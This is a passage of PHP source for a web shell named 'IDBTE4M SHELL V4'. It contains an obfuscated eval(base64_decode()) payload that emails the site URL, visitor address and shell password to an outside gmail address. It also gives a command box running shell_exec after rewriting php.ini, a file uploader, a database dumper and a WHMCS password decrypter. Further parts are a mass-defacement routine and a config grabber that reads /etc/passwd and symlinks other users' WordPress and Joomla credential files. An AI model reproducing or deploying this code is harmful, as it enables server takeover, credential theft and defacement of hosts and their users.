XrhxC06RLOSu5PJX8TOXcKP0oIk590Wi5NiQeWwFAKwkow/NNBflzRtlCx32rA101eo1uet1blJkMPM/qoXcfUfsaXfavcJrOgAdLyUdUZkDZUaaMs5wnPiVPeHaJfWpff16RL8U2viuF8IZcBOUBQ2C4JkljtyiNFVkg/0NSkPI0PqXsvhB/Rj8XUCizSwrP7JBtFy+BVoR/uL++HFi57vrWQDrPUBjI1KSdtIpcgTbGC2EpDysNPb63ehaoGVY9V0vHUTneieyoRBF5W5LKpH+e7jdWAaqJTibQpEPGhZrn+wL+ywz6COJKKlFrsolBcKhkd02nBilSBa1GlWy77DXKxsGkEI2qwoazxmoGsitYOLL5hIfzGPoehz5hJM0CS5CH4JvRkgrJLJNALxgiSNyS2zJQwDB8wRMa6NpcGHqSJHHTEIU7oTZozYkCg5G5VIdnBtY/7s9i9qgqekYI9WwTggJZKDNnEv9lv9vYGKayK6SDjZBvOc/A5lDINAQHoQwmJgk6wGjLiUggvnqxonwrxVruppRVxac4grXVDrqL5vtmqHVPmsXQslApDZHNpamEUqf8f9z6H45bjb923jrdOm/BJoQvSVsvHOS5aaV7yyDbGjhRpFNOC6AQ7qbjjxJWCvKFAGfdGxx8VvTaFadNOz5DOSk3SgujFBhB3iavXf5s3QYJm9H9uNQMx0cq+jVxtVPNbOG3+U1x+fts9oXGGrxgG4Rz4yglCV/oUT7zk6KFJIOcafquMV0SiZijQuFYms3mWycRwMv0B9PAcvLR8ctiZ/VSTbYvfzr5CUNfzstiXEA7PlkyV8O2E/kRM7UxozTUWjZlaoYOaEx5rVZbGbT38wRh90HVC17Ca1giywdw/QozeXXSRHkPKt7Inq7lz7TmzOfzmsLLqhNGiTdaGNwLx/lbYfFZD/bTPf6xl6qQSA7CZvkEu3REHMrM9nW1ffvKjQLihXUTFPRKGDWIXGrWX8EMy6EA1As3WKrNG6GCa4AqDGXUJ/HC7wm3uh8unlIzPhm+1zI8XFnLJ6flrS4jDYAw6k4RKr7zyPa/UZ/TXXQYil6B6tt2O+9Y3sF43TNWfBhuq7XGZEz+a/d1Ipsg8gdBAfQPxG+ig/1+S594KG02UDQLjdyhtPHmBJTTFw22k9N3jQKP1A7p+zUpILowwbIrr7/Ez7f/AA==";
515. eval(base64_decode("JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQokdmlzaXRjID0gMDsNCiR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOw0KJGp1ZHVsID0gIlJFU1VMVCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQokYm9keSA9ICJSZXN1bHQ6ICR0YXJnZXQgYnkgJHZpc2l0b3IgIFxuIHBhc3N3b3JkIC0gJGF1dGhfcGFzcyI7DQppZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJqZW1idXRrYXU0OUBnbWFpbC5jb20iLCRqdWR1bCwkYm9keSk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"));
516. $jumper="fVJtb5swEP4rF4Rko7Ka7WMCpFLVfp20fWwrarA9PAFGtlmXVfvvuwtN1mjShEDmebl77kB3vYOkjLIdNHSDDKF6TLpRte7nY1KX0eOtoHNDmOWE1CdEkx3wNIxQgZ1s801HzoI0uhmd0iyDqoIigz2sEuaMYVtQVvPkznvnt/D1JEb681SKqGp8eHpQjLpU9sc5y3d5kJREIFgn2Q6Cjk20o24GO9rIC4Ru0hnFLwrrGTfriTOhYydWkOXMMxRZA3zzJszglRIBTx4+PMExFmzh1i1qeo7wRUsF7yr8m5By/IZ0XlpsKb2XB45IugTtwwXSuclcABbfih289HbQfGO0M/yUKXvFlUVPQ+BOwxlfo6Ozho9FQarZURfU4oGTJ2dbdgowyZEWG5YWiZUtcrKQQFn/iz6K6N2oBbs+O66ZwGkG2zV9HAfB1qb8b8UNuhhlJNyGxuOSaBf8WJOI45DNvIR+tYX87MbW71nslK82WiNdqb26orNxWLfr4a0CyLAOheU1/ans4d4tk4LNE5QSeq9NlewP1cU4l6Mk9X9IUQpZl62vGTXf138A";
517. $ekse="eJyVk21r2zAQx9/vUxwiUIcFF8beLCWsoXFwRx+M422MtphzfXUUP2LJLdun30mOU9qalaEXEnc//U+6vzRRWfJpAWJHZdLpHLvPX06zEmXh3telOPkwkQ0sICNN1aMjQu/yOvLi5WoViiknt7XSNmsWFZbkTO0WBYdo8tvGLWqSitpHajk/iTde+MMLb476Ob5aXnpHdwYx7AvCj6Ig9q83kc03mNEVizKSoKJe/1ntLDwPor2aqZjKF+VE4Ae8vlgL1kpRU5zSA3aFjrUs6U9dUaxIO2KpJB5/wxxbjfayhmUhMzkihTX8smGz6xD253KubLgkpfic4HJzFx//PeAGvjdFjSk3JiTFZ4E7eGePGbeVeFXprJBUaTgPYA7CZSdc8Rba9BY8Q2qM8tkE22ULGUvGqFXNj6Xqmd7aMeqCNObQDXe0NNviimNeDHa64usO8xab5q1AhFWWYbHfya0eq/ITc90B5YryTsmeNe68Yg0aoFJPdZvCZktFAdDD2Olt3HBqTP19O9hGWPH7gf9xT3XJju7NcxeHN7DvpElvyUTMfxLrti7nIKuH+hQrLZNau83TbWtlzI91JuYvzwbF2XD62SAyPfkLBNIljA==";
518. ?>
519. <html><head><link rel="SHORTCUT ICON" href="http://kefiex.yu.tl/files/bnx.png"><title>-=[ IDBTE4M SHELL V4 ]=-</title>
520. <script type="text/javascript">
521. function tukar(lama,baru){
522.     document.getElementById(lama).style.display = 'none';
523.     document.getElementById(baru).style.display = 'block';
524. }
525. </script>
526. <style type="text/css">
527. body{
528.     background:#000000;;
529. }
530. a {
531. text-decoration:none;
532. }
533. a:hover{
534. border-bottom:1px solid #FF0000;
535. }
536. *{
537.     font-size:11px;
538.     font-family:Tahoma,Verdana,Arial;
539.     color:#FFFFFF;
540. }
541. #menu{
542.     background:#000000;
543.     margin:8px 2px 4px 2px;
544.    
545. }
546. #menu a{
547.     padding:4px 18px;
548.     margin:0;
549.     background:#c40909;
550.     text-decoration:none;
551.     letter-spacing:2px;
552.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
553. }
554. #menu a:hover{
555.     background:#6a0707;
556.     border-bottom:1px solid #c40909;
557.     border-top:1px solid #c40909;
558. }
559. .tabnet{
560.     margin:15px auto 0 auto;
561.     border: 1px solid #c40909;
562. }
563. .main {
564.     width:100%;
565. }
566. .gaya {
567.     color: #FF0000;
568. }
569. .inputz{
570.     background:#6a0707;
571.     border:0;
572.     padding:2px;
573.     border-bottom:1px solid #c40909;
574.     border-top:1px solid #c40909;
575. }
576. .inputzbut{
577.     background:#6a0707;
578.     color:#ff000;
579.     margin:0 4px;
580.     border:1px solid #444444;
581.  
582. }
583. .inputz:hover, .inputzbut:hover{
584.     border-bottom:1px solid #FF0000;
585.     border-top:1px solid #FF0000;
586. }
587. .output {
588.     margin:auto;
589.     border:1px solid #FF0000;
590.     width:100%;
591.     height:400px;
592.     background:#000000;
593.     padding:0 2px;
594. }
595. .cmdbox{
596.     width:100%;
597. }
598. .head_info{
599.     padding: 0 4px;
600.     float:center;
601. }
602. .jaya{ font-family: ;}
603.  
604. .b374k{
605.     font-size:30px;
606.     padding:0;
607.     color:#444444;
608. }
609. .b374k_tbl{
610.     text-align:center;
611.     margin:0 4px 0 0;
612.     padding:0 4px 0 0;
613.     border-right:1px solid #c40909;
614. }
615. .phpinfo table{
616.     width:100%;
617.     padding:0 0 0 0;
618. }
619. .phpinfo td{
620.     background:#6a0707;
621.     color:#cccccc;
622. padding:6px 8px;;
623. }
624. .phpinfo th, th{
625.     background:#6a0707;
626.     border-bottom:1px solid #c40909;
627. font-weight:normal;
628. }
629. .phpinfo h2, .phpinfo h2 a{
630.     text-align:center;
631.     font-size:16px;
632.     padding:0;
633.     margin:30px 0 0 0;
634.     background:#c40909;
635.     padding:4px 0;
636. }
637. .explore{
638. width:100%;
639. }
640. .explore a {
641. text-decoration:none;
642. }
643. .explore td{
644. border-bottom:1px solid #c40909;
645. padding:0 8px;
646. line-height:24px;
647. }
648. .explore th{
649. padding:3px 8px;
650. font-weight:normal;
651. }
652. .explore th:hover , .phpinfo th:hover{
653. border-bottom:1px solid #FF0000;
654. }
655. .explore tr:hover{
656. background:#6a0707;
657. }
658. .viewfile{
659. background:#EDECEB;
660. color:#000000;
661. margin:4px 2px;
662. padding:8px;
663. }
664. .sembunyi{
665. display:none;
666. padding:0;margin:0;
667. }
668.  
669. </style></head>
670. <body onLoad="document.getElementById('cmd').focus();">
671. <div class="main">
672. <!-- head info start here -->
673. <div class="head_info">
674. <table ><tr>
675. <td><table class="b374k_tbl"><tr><td><a href="?<?php echo "y=".$pwd; ?>&amp;x=about"><span class="b374k"><img src="http://kefiex.yu.tl/files/bnx.png" /></span></a></td></tr><br>
676. <div id="menu" align="left">
677. <form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
678. <td><!-- onMouseOver="this.focus();" --><nobr><input type="file" name="file" class="inputz" size="50">
679. <input name="_upl" type="submit" id="_upl" class="inputz" value="Upload"></form></div></b></td></tr></table></td>
680. <td><?php echo $buff; ?></td>
681. </td>
682. </tr>
683. </tr></table>
684. </div>
685. <div id="menu" align="center">
686.  
687. <font color=red size=2 face="TAHOMA">
688. <p align="center" dir="ltr"> <hr><center>
689. <font color="red" font size=3 > | <font color="white" font size=3 >
690. <a href="?" style="text-decoration: none">
691. Home </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
692. <a href="?jak=sql" style="text-decoration: none">
693. SQL </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
694. <a href="?jak=cp" style="text-decoration: none">
695. Cpanel Cracker </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
696. <a href="?jak=jump" style="text-decoration: none">
697. Jumping </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
698. <a href="?x=maling" style="text-decoration: none">
699. Maling Script </a> <font color="white" font size=3 ></font>
700. <font color="red" font size=3 > |</font>
701. <br><hr><center>
702. <font color="red" font size=3 > |</font>
703. <a href="?jak=auto" style="text-decoration: none">
704. Auto Wget </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
705. <a href="?jak=config" style="text-decoration: none">
706. Config Grabber </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
707. <a href="?jak=wp2" style="text-decoration: none">
708. Config Auto Get </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
709. <a href="?jak=zonh" style="text-decoration: none">
710. Zon-H </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
711. <a href="?jak=mass" style="text-decoration: none">
712. Mass Deface </a> <font color="white" font size=3 ></font>
713. <font color="red" font size=3 >|</font>
714. <hr>
715. <font color="red" font size=3 >|</font>
716. <a href="?jak=brute" style="text-decoration: none">
717. Cp Brute </a> <font color="white" font size=3 ></font>
718. <font color="red" font size=3 >|</font>
719. <a href="?jak=finder" style="text-decoration: none">
720. Admin Finder </a> <font color="white" font size=3 ></font>
721. <font color="red" font size=3 > |</font>
722. <a href="?jak=sym" style="text-decoration: none">
723. Symlink </a> <font color="white" font size=3 ></font>
724. <font color="red" font size=3 > |</font>
725. <a href="?jak=dump" style="text-decoration: none">
726. Db Dump </a> <font color="white" font size=3 ></font>
727. <font color="red" font size=3 > |</font>
728. <a href="?jak=has" style="text-decoration: none">
729. Password Hash </a> <font color="white" font size=3 ></font>
730. <font color="red" font size=3 > |</font>
731. <a href="?jak=whmcs" style="text-decoration: none">
732. Whmcs Decoder </a> <font color="white" font size=3 ></font>
733. <font color="red" font size=3 > |</font>
734. <a href="?jak=wpp" style="text-decoration: none">
735. Wp Mass </a> <font color="white" font size=3 ></font>
736. <font color="red" font size=3 > |</font>
737. <hr>
738. <font color="red" font size=3 >|</font>
739. <a href="?jak=jomla" style="text-decoration: none">
740. Jomla  Mass </a> <font color="white" font size=3 ></font>
741. <font color="red" font size=3 > |</font>
742. <a href="?jak=wpmas" style="text-decoration: none">
743. Wp Mass Manual </a> <font color="white" font size=3 ></font>
744. <font color="red" font size=3 > |</font>
745. </td><hr></center>
746. </tr></table></div>
747.  
748. <div id="viewfile" align="left">
749. <form method="post">
750. <td><nobr><b>CMD</b></nobr></td>
751. <td><!-- onMouseOver="this.focus();" --><nobr><input id="cmd" class="inputz" type="text" name="cmd" style="width:300px;" value="" />
752. <input class="inputzbut" type="submit" value=" >> " style="width:50px;" />
753. </form>
754.  
755.  
756. <?php
757. if( $_POST['_upl'] == "Upload" ) {
758.         if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
759.         else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
760. }
761. ?>
762. <?php
763. /*******************************************\
764. |        CMD linux DTT 2014
765.  
766. \*******************************************/
767. $x0f = "fopen";
768. $x10 = "fwrite";
769. $x11 = "function_exists";
770. $x12 = "shell_exec";
771. if (isset($_POST['cmd'])) {
772.     $x0b = $x0f('php.ini', 'w');
773.     $x0c = " disable_functions=none ";
774.     $x10($x0b, $x0c);
775.     if ($x11('shell_exec')) {
776.         $x0d = $_POST['cmd'];
777.         $x0e = $x12("$x0d");
778.         echo "<div id=result>";
779.         echo "<span class=Y><pre>$x0e</pre></span";
780.     }
781.     echo "</div>";
782. }
783. ?>
784. <center>
785. <div id="menu" align="center">
786. <?php
787. if (isset($_GET['jak']) && ($_GET['jak'] == 'dump')) { ?>
788. <form action="?jak=dump" method="post">
789. <?php
790. echo $head.'<p align="center">';
791. echo '
792. <table width=371 class=tabnet >
793. <tr><th colspan="2">Database Dump</th></tr>
794. <tr>
795.     <td>Server </td>
796.     <td><input class="inputz" type=text name=server size=52></td></tr><tr>
797.     <td>Username</td>
798.     <td><input class="inputz" type=text name=username size=52></td></tr><tr>
799.     <td>Password</td>
800.     <td><input class="inputz" type=text name=password size=52></td></tr><tr>
801.     <td>DataBase Name</td>
802.     <td><input class="inputz" type=text name=dbname size=52></td></tr>
803.     <tr>
804.     <td>DB Type </td>
805.     <td><form method=post action="'.$me.'">
806.     <select class="inputz" name=method>
807.         <option  value="gzip">Gzip</option>
808.         <option value="sql">Sql</option>
809.         </select>
810.     <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
811.     </form></center></table>';
812. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
813. $date = date("Y-m-d");
814. $dbserver = $_POST['server'];
815. $dbuser = $_POST['username'];
816. $dbpass = $_POST['password'];
817. $dbname = $_POST['dbname'];
818. $file = "Dump-$dbname-$date";
819. $method = $_POST['method'];
820. if ($method=='sql'){
821. $file="Dump-$dbname-$date.sql";
822. $fp=fopen($file,"w");
823. }else{
824. $file="Dump-$dbname-$date.sql.gz";
825. $fp = gzopen($file,"w");
826. }
827. function write($data) {
828. global $fp;
829. if ($_POST['method']=='ssql'){
830. fwrite($fp,$data);
831. }else{
832. gzwrite($fp, $data);
833. }}
834. mysql_connect ($dbserver, $dbuser, $dbpass);
835. mysql_select_db($dbname);
836. $tables = mysql_query ("SHOW TABLES");
837. while ($i = mysql_fetch_array($tables)) {
838.     $i = $i['Tables_in_'.$dbname];
839.     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
840.     write($create['Create Table'].";\n\n");
841.     $sql = mysql_query ("SELECT * FROM ".$i);
842.     if (mysql_num_rows($sql)) {
843.         while ($row = mysql_fetch_row($sql)) {
844.             foreach ($row as $j => $k) {
845.                 $row[$j] = "'".mysql_escape_string($k)."'";
846.             }
847.             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
848.         }
849.     }
850. }
851. if ($method=='ssql'){
852. fclose ($fp);
853. }else{
854. gzclose($fp);}
855. header("Content-Disposition: attachment; filename=" . $file);  
856. header("Content-Type: application/download");
857. header("Content-Length: " . filesize($file));
858. flush();
859.  
860. $fp = fopen($file, "r");
861. while (!feof($fp))
862. {
863.     echo fread($fp, 65536);
864.     flush();
865. }
866. fclose($fp);
867. }
868.  
869. }
870. elseif(isset($_GET['jak']) && ($_GET['jak'] == 'has'))
871.     {
872. $submit= $_POST['enter'];
873. if (isset($submit)) {
874. $pass = $_POST['password']; // password
875. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
876. $hash = md5($pass); // md5 hash #1
877. $md4 = hash("md4",$pass);
878. $hash_md5 = md5($salt.$pass); // md5 hash with salt #2
879. $hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
880. $hash1 = sha1($pass); // sha1 hash #4
881. $sha256 = hash("sha256",$text);
882. $hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
883. $hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
884. }
885. echo '<form action="" method="post"><b><table class=tabnet>';
886. echo '<tr><th colspan="2">Password Hash</th></center></tr>';
887. echo '<tr><td><b>Enter the word you want to encrypt:</b></td>';
888. echo '<td><input class="inputz" type="text" name="password" size="40" />';
889. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
890. echo '</td></tr><br>';
891. echo '<tr><th colspan="2">Hash Result</th></center></tr>';
892. echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
893. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
894. echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
895. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
896. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
897. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
898. echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
899. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
900. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
901. }
902. elseif(isset($_GET['jak']) && ($_GET['jak'] == 'whmcs'))
903. {  
904. ?>
905. <form action="?y=<?php echo $pwd; ?>&amp;jak=whmcs" method="post">
906.  
907. <?php
908.  
909. function decrypt ($string,$cc_encryption_hash)
910. {
911.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
912.     $hash_key = _hash ($key);
913.     $hash_length = strlen ($hash_key);
914.     $string = base64_decode ($string);
915.     $tmp_iv = substr ($string, 0, $hash_length);
916.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
917.     $iv = $out = '';
918.     $c = 0;
919.     while ($c < $hash_length)
920.     {
921.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
922.         ++$c;
923.     }
924.     $key = $iv;
925.     $c = 0;
926.     while ($c < strlen ($string))
927.     {
928.         if (($c != 0 AND $c % $hash_length == 0))
929.         {
930.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
931.         }
932.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
933.         ++$c;
934.     }
935.     return $out;
936. }
937.  
938. function _hash ($string)
939. {
940.     if (function_exists ('sha1'))
941.     {
942.         $hash = sha1 ($string);
943.     }
944.     else
945.     {
946.         $hash = md5 ($string);
947.     }
948.     $out = '';
949.     $c = 0;
950.     while ($c < strlen ($hash))
951.     {
952.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
953.         $c += 2;
954.     }
955.     return $out;
956. }
957.  
958. echo "
959. <br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
960. <center>
961. <br>
962.  
963. <FORM action=''  method='post'>
964. <input type='hidden' name='form_action' value='2'>
965. <br>
966. <table class=tabnet style=width:320px;padding:0 1px;>
967. <tr><th colspan=2>WHMCS Decoder</th></tr>
968. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
969. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
970. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
971. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
972. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
973. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
974. </table>
975. </FORM>
976. </center>
977. ";
978.  
979.  if($_POST['form_action'] == 2 )
980.  {
981.  //include($file);
982.  $db_host=($_POST['db_host']);
983.  $db_username=($_POST['db_username']);
984.  $db_password=($_POST['db_password']);
985.  $db_name=($_POST['db_name']);
986.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
987.  
988.  
989.  
990.     $link=mysql_connect($db_host,$db_username,$db_password) ;
991.         mysql_select_db($db_name,$link) ;
992. $query = mysql_query("SELECT * FROM tblservers");
993. while($v = mysql_fetch_array($query)) {
994. $ipaddress = $v['ipaddress'];
995. $username = $v['username'];
996. $type = $v['type'];
997. $active = $v['active'];
998. $hostname = $v['hostname'];
999. echo("<center><table border='1'>");
1000. $password = decrypt ($v['password'], $cc_encryption_hash);
1001. echo("<tr><td>Type</td><td>$type</td></tr>");
1002. echo("<tr><td>Active</td><td>$active</td></tr>");
1003. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
1004. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
1005. echo("<tr><td>Username</td><td>$username</td></tr>");
1006. echo("<tr><td>Password</td><td>$password</td></tr>");
1007.  
1008. echo "</table><br><br></center>";
1009. }
1010.  
1011.     $link=mysql_connect($db_host,$db_username,$db_password) ;
1012.         mysql_select_db($db_name,$link) ;
1013. $query = mysql_query("SELECT * FROM tblregistrars");
1014. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
1015. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
1016. while($v = mysql_fetch_array($query)) {
1017. $registrar     = $v['registrar'];
1018. $setting = $v['setting'];
1019. $value = decrypt ($v['value'], $cc_encryption_hash);
1020. if ($value=="") {
1021. $value=0;
1022. }
1023. $password = decrypt ($v['password'], $cc_encryption_hash);
1024. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
1025. }
1026. }
1027. }
1028.  
1029. ?>
1030. <?php
1031. if (isset($_GET['jak']) && ($_GET['jak'] == 'mass')) { ?>
1032. <form action="?jak=mass" method="post">
1033. <?php ?>
1034. <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
1035.  
1036. <p class="style3">
1037.  
1038. <span <ul>
1039.  
1040.     <span class="style32">
1041.     <span class="style39">
1042. <span style="font-weight: 700;" class="style33">
1043.     </span></p><br>
1044. <span style="font-weight: 700;" class="style33">
1045.     <font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);"><br>
1046. <br>
1047. </center>
1048. <div class="style31">
1049. <center>
1050. <form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
1051. <div class="style31">
1052. [+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
1053. [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
1054. <input type='submit' name='execmassdeface' value='Execute'></div>
1055. </form></td></center>
1056. <?php
1057. echo "<center><textarea rows='10' cols='100'>";
1058. $defaceurl = $_POST['massdefaceurl'];
1059. $dir = $_POST['massdefacedir'];
1060. echo $dir . "
1061. ";
1062. if (is_dir($dir)) {
1063.     if ($dh = opendir($dir)) {
1064.         while (($file = readdir($dh)) !== false) {
1065.             if (filetype($dir . $file) == "dir") {
1066.                 $newfile = $dir . $file . "/jek.php";
1067.                 echo $newfile . "
1068. ";
1069.                 if (!copy($defaceurl, $newfile)) {
1070.                     echo "failed to copy $file...
1071. ";
1072.                 }
1073.             }
1074.         }
1075.         closedir($dh);
1076.     }
1077. }
1078. echo "</textarea></center>";
1079. }
1080. ?>
1081. <?php
1082. // SHELL IDBTE4M V2
1083. // BY ./KEFIEX404 IDBTE4M
1084. set_time_limit(0);
1085. error_reporting(0);
1086.  
1087. $htcs = "
1088. hacked by shamp0erna99";
1089. $f =@fopen ('index.txt','w');
1090. fwrite($f , $htcs);
1091. $pg = basename(__FILE__);
1092.  
1093. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
1094. $u = explode("/",$pageURL );
1095. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
1096.  
1097. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
1098. $u = explode("/",$pageFTP );
1099. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
1100. ?>
1101.  
1102. <?php
1103. if (isset($_GET['jak']) && ($_GET['jak'] == 'config')) {
1104. ?>
1105. <form action="?&amp;jak=config" method="post">
1106. <?php @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
1107. echo '<form method="POST"><textarea cols="30" name="passwd"  rows="10">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
1108. </textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
1109. <select class="inp"  title="Select Your Type File"  name="type" size=""><option title="type txt" value=".txt">.txt</option><option title="type php" value=".php">.php</option><option title="type shtml" value=".shtml">.shtml</option><option title="type ini" value=".ini">.ini</option></select>
1110. <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
1111. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
1112. if ($_POST['conf']) {
1113. $folfig = $_POST['folfig']; $type = $_POST['type'];
1114. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf Bosq fitur Symlink masih di disabled :( </blink>');}
1115. @mkdir($folfig, 0755);
1116. @chdir($folfig);
1117. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex jak.phtml\nAddType txt .php\nAddHandler txt .php";
1118. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
1119. $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya bosq ...</center></blink>";
1120. foreach($passwd as $pwd){ $user=trim($pwd);
1121. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.'');
1122. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
1123. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
1124. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
1125. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
1126. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
1127. @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
1128. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
1129. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
1130. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.'');
1131. @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.'');
1132. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
1133. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
1134. @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
1135. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
1136. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
1137. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
1138. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.'');
1139. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.'');
1140. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
1141. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
1142. @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
1143. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
